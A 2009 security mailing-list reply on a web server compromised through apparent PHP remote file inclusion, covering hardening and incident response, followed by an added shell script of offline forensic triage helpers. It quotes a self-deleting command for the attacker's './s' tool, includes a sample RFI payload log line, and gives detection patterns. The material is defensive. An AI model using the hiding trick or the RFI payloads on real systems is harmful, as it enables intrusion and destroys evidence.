Security Basics mailing list archives

Re: found clues about a security issue in a web server


From: Aarón Mizrachi <unmanarc () gmail com>
Date: Wed, 18 Mar 2009 02:51:29 -0430

On Sunday 15 March 2009 11:40:22 kazabe wrote:
Hi.

In the last week my internet connection was frozen. After ruling out
ISP and routing problems, I saw this process on my webserver (located
behind my router):

www-data   20580   00   00   815    355   ?   S    07:16    6:01
./s    86.23.114.12  80

That process was using all the bandwidth (the address displayed is a
remote IP, without any relationship with us). After killing that
process, the internet service is normal again. The router and the
webserver are running under Debian Lenny. The web server is not
remotely accessible; all the administration is physically at the PC.
The webserver doesn't have any remote access (no ftp, or ssh, or
telnet. Nothing).

I tried to find that "./s" but I can't find it yet. How can I detect
how that script was injected?

Hi, sounds like exploitation of bad script code (PHP, JSP, Perl, etc...)

Why?

Running ./s as www-data sounds like a reverse connection started as the Apache 
user, which is likely to happen in script exploitation attacks.

Even more so if you say that the only internet-open port is the webserver.
------------------------------------------------------


The webserver only publishes a website related to a company
internal process (but it is published to the Internet by a port forwarding
from the router). That website uses PHP and MySQL.

What can I check to solve that security issue?

Thanks in advance.


That security issue happens because of badly-programmed script code. First of all, 
what script engines are installed on your server (PHP, JSP, Mono ASP.NET, Perl, 
cgi-bin, etc.)? 

If it's a CMS, is it properly updated?

Each language is a bit different from the others... e.g. on PHP, "safe_mode 
on" is mandatory as a security matter, "url_fopen off" is mandatory to prevent 
RFI... 

Don't use or activate anything that you don't really use... if you don't use 
cgi-bin, DISABLE IT. 

-------------------------------------------------
Location of s:

check in /tmp
check in www-data writable dirs

But remember, s could be deleted when you kill it; a simple bash sentence 
demonstrates that:

(./s    86.23.114.12  80; rm -rf ./s)

Then when you kill s, the rm -rf acts... and bye bye to s.

---------------------------------------------------
Scope:

That ps line proves that a hacker has REMOTE control of a user shell on 
your server, which is bad enough; you could have trojans/rootkits. (Don't 
even think about your firewalls; they don't protect you against reverse connections.)

An even worse scenario involves root compromise and compromise of other systems 
over the network using MITM, etc... 

---------------------------------------------------
Suggestions:

- Down your portal
- Check your apache logs (/var/log/www or similar). 
- Check for rootkits
- Check for 
- Create a hard-drive image (http://dcfldd.sourceforge.net/)
- Reinstall (please check if your Linux distro is currently maintained, it's so 
important...)
- Do a server security hardening
- Check for updates and enable auto-updates
- Audit your code (PHP or something), update everything hand-updateable like 
CMS, etc.
- Audit your FS permissions (chown and chmod are your best friends)
- Up your portal
- Reboot your server weekly (uptime is the best enemy of security)



;-)
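The triage steps in this reply (spotting a web-server-user process with a remote address and port on its command line, copying the binary out of /proc before it is killed and self-deletes, and grepping the Apache log for remote file inclusion requests) as an added shell example. This is not code from the thread or from Debian/Apache; the ps and log samples, the documentation-range addresses and the /tmp/evidence path are constructed for it.

```shell
#!/bin/sh
# Added triage helpers for the case in the thread (not code from the post).
# Everything below runs offline on constructed sample data; the addresses
# (203.0.113.x, 198.51.100.x, 192.0.2.x) are documentation ranges, not the
# one from the original report.

# Constructed `ps -eo user,pid,args` output, shaped like the line in the post.
PS_SAMPLE='USER PID COMMAND
root 1 /sbin/init
www-data 2211 /usr/sbin/apache2 -k start
www-data 20580 ./s 203.0.113.5 80
kazabe 3001 -bash'

# Constructed Apache combined-log lines; the first one carries a remote URL in
# a query parameter, the shape of a remote file inclusion attempt.
LOG_SAMPLE='203.0.113.9 - - [15/Mar/2009:07:15:58 -0430] "GET /index.php?page=http://198.51.100.7/s.txt? HTTP/1.1" 200 512
192.0.2.4 - - [15/Mar/2009:07:16:02 -0430] "GET /index.php?page=about HTTP/1.1" 200 3456
198.51.100.3 - - [15/Mar/2009:07:16:10 -0430] "POST /admin/login.php HTTP/1.1" 302 0'

# 1. Processes owned by the web server user whose command line ends in a
#    dotted-quad address and a port: the "./s <ip> <port>" pattern. Reads
#    `ps -eo user,pid,args` output on stdin; prints "pid command addr port".
find_suspicious_web_procs() {
    web_user="${1:-www-data}"
    awk -v u="$web_user" \
        '$1 == u && $0 ~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+[ \t]+[0-9]+[ \t]*$/ {
            print $2, $3, $4, $5
        }'
}

# 2. Before killing a suspect PID, copy its executable out of /proc. The file
#    on disk may already be gone (the "(./s ...; rm -rf ./s)" trick), but the
#    kernel keeps the mapped image reachable through /proc/PID/exe until the
#    process exits. Prints "deleted-on-disk" or "on-disk". The default evidence
#    directory is an assumption for this example.
preserve_exe() {
    pid="$1"
    out="${2:-/tmp/evidence}"
    target=$(readlink "/proc/$pid/exe") || return 1
    mkdir -p "$out" || return 1
    cp "/proc/$pid/exe" "$out/pid-$pid.bin" || return 1
    case "$target" in
        *" (deleted)") echo "deleted-on-disk" ;;
        *)             echo "on-disk" ;;
    esac
}

# 3. Access-log lines where a query parameter value is itself a URL
#    (http, https or ftp, plain or with the colon percent-encoded).
#    Reads log lines on stdin; prints the matching lines.
find_rfi_requests() {
    grep -E '"(GET|POST|HEAD) [^ ]*\?[^ ]*=(https?|ftp)(:|%3[aA])'
}

# Demo run on the constructed samples.
echo "== suspicious web-user processes =="
printf '%s\n' "$PS_SAMPLE" | find_suspicious_web_procs www-data
echo "== possible remote file inclusion requests =="
printf '%s\n' "$LOG_SAMPLE" | find_rfi_requests
```

On a live box the first helper is fed with `ps -eo user,pid,args | find_suspicious_web_procs www-data`, and `preserve_exe 20580` is run before `kill`, since the copy is only possible while the process is alive; the log helper takes `/var/log/apache2/access.log` (or whatever path the server uses) on stdin and is a coarse first filter, so matches still need reading by hand.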

